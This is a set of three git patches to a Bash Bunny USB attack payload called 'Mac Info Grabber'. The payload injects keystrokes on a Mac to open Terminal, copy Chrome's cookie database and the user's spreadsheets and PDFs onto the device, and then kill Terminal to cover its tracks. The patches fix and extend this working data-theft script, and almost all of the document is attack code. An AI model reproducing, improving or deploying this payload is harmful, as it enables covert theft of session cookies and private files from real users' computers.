From f65e5ef2f209e12c6c4e9aab04d2b09a779a9305 Mon Sep 17 00:00:00 2001
From: Alex Flores <domain@me.com>
Date: Mon, 13 Mar 2017 14:31:47 -0400
Subject: [PATCH 1/3] red means failure; add amber light

---
 payloads/library/macinfograbber/payload.txt | 3 ++-
 payloads/library/macinfograbber/readme.md   | 3 ++-
 2 files changed, 4 insertions(+), 2 deletions(-)

diff --git a/payloads/library/macinfograbber/payload.txt b/payloads/library/macinfograbber/payload.txt
index cf4461b..932e4ca 100644
--- a/payloads/library/macinfograbber/payload.txt
+++ b/payloads/library/macinfograbber/payload.txt
@@ -7,12 +7,13 @@
 # Steaks cookies from chrome and documents from the documents folder (spreadsheets)
 # then stashes them in /root/udisk/loot/MacLoot
 #
+# Amber..............Executing payload
 # Red................Failed to get spreadsheets
 # Purple.............Got some spreadsheets
 # Green..............Finished
 #
 
-LED R
+LED G R
 ATTACKMODE HID STORAGE
 LOOTDIR=/root/udisk/loot/MacLoot
 mkdir -p $LOOTDIR
diff --git a/payloads/library/macinfograbber/readme.md b/payloads/library/macinfograbber/readme.md
index 2222832..4dda478 100644
--- a/payloads/library/macinfograbber/readme.md
+++ b/payloads/library/macinfograbber/readme.md
@@ -15,6 +15,7 @@ This payload can be easily modified to grab other files like word docs or csv fi
 
 | LED                | Status                                       |
 | ------------------ | -------------------------------------------- |
+| Amber              | Executin Payload                             |
 | Green              | Attack Finished                              |
 | Purple             | Successfully grabbed xls or xlsx files       |
-| RED                | Did not get any xls or xlsx files            |
+| Red                | Did not get any xls or xlsx files            |

From 889723f455c8fb571f3687b9d1551efc4d5a5fe5 Mon Sep 17 00:00:00 2001
From: Alex Flores <domain@me.com>
Date: Mon, 13 Mar 2017 14:32:33 -0400
Subject: [PATCH 2/3] version bump

---
 payloads/library/macinfograbber/payload.txt | 2 +-
 payloads/library/macinfograbber/readme.md   | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/payloads/library/macinfograbber/payload.txt b/payloads/library/macinfograbber/payload.txt
index 932e4ca..3d31b2b 100644
--- a/payloads/library/macinfograbber/payload.txt
+++ b/payloads/library/macinfograbber/payload.txt
@@ -2,7 +2,7 @@
 #
 # Title:         Mac Info Grabber
 # Author:        kmakblob
-# Version:       1.1
+# Version:       1.2
 #
 # Steaks cookies from chrome and documents from the documents folder (spreadsheets)
 # then stashes them in /root/udisk/loot/MacLoot
diff --git a/payloads/library/macinfograbber/readme.md b/payloads/library/macinfograbber/readme.md
index 4dda478..8b9479a 100644
--- a/payloads/library/macinfograbber/readme.md
+++ b/payloads/library/macinfograbber/readme.md
@@ -1,7 +1,7 @@
 # Mac Info Grabber for the BashBunny
 
 * Author: kmakblob
-* Version: Version 1.0
+* Version: Version 1.2
 * Target: OSX
 
 ## Description

From 0fd8973e123057db0cd4c374c3b58dc1d2a20a26 Mon Sep 17 00:00:00 2001
From: Alex Flores <domain@me.com>
Date: Mon, 13 Mar 2017 14:33:31 -0400
Subject: [PATCH 3/3] fixes broken code

  - fixes lootdir path
  - dont capitalize var names that aren't exported
  - indentation
  - escape shell characters that are passed to QUACK
  - account for variable copy times by joining cp and exit commands
  - sync the disk
---
 payloads/library/macinfograbber/payload.txt | 38 +++++++++++----------
 1 file changed, 20 insertions(+), 18 deletions(-)

diff --git a/payloads/library/macinfograbber/payload.txt b/payloads/library/macinfograbber/payload.txt
index 3d31b2b..1ab7868 100644
--- a/payloads/library/macinfograbber/payload.txt
+++ b/payloads/library/macinfograbber/payload.txt
@@ -15,36 +15,38 @@
 
 LED G R
 ATTACKMODE HID STORAGE
-LOOTDIR=/root/udisk/loot/MacLoot
-mkdir -p $LOOTDIR
+
+lootdir=loot/MacLoot
+mkdir -p /root/udisk/$lootdir
+
 QUACK GUI SPACE
 QUACK DELAY 1000
 QUACK STRING terminal
 QUACK ENTER
-QUACK DELAY 8000
-QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/xlsx
+QUACK DELAY 5000
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/$LOOTDIR/chromecookies.db
+QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \>
+/Volumes/BashBunny/$lootdir/chromecookies.db
 QUACK ENTER
 QUACK DELAY 1000
-QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/$LOOTDIR/xlsx/
-QUACK ENTER
-QUACK DELAY 1000
-QUACK GUI q
-QUACK DELAY 500
+QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal
 QUACK ENTER
 
+# Sync filesystem
+sync
+
 # Green LED for finished
 LED G
 
-files=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xls 2> /dev/null | wc -l)
-files2=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xlsx 2> /dev/null | wc -l)
-if [ "$files" != "0" -o "$files2" != "0"]
-then
-# Got spreadsheet files
-LED R B
+files=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xls 2> /dev/null | wc -l)
+files2=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xlsx 2> /dev/null | wc -l)
+
+if [ "$files" != "0" -o "$files2" != "0"]; then
+  # Got spreadsheet files
+  LED R B
 else
-LED R
-# No spread sheets
+  LED R
+  # No spread sheets
 fi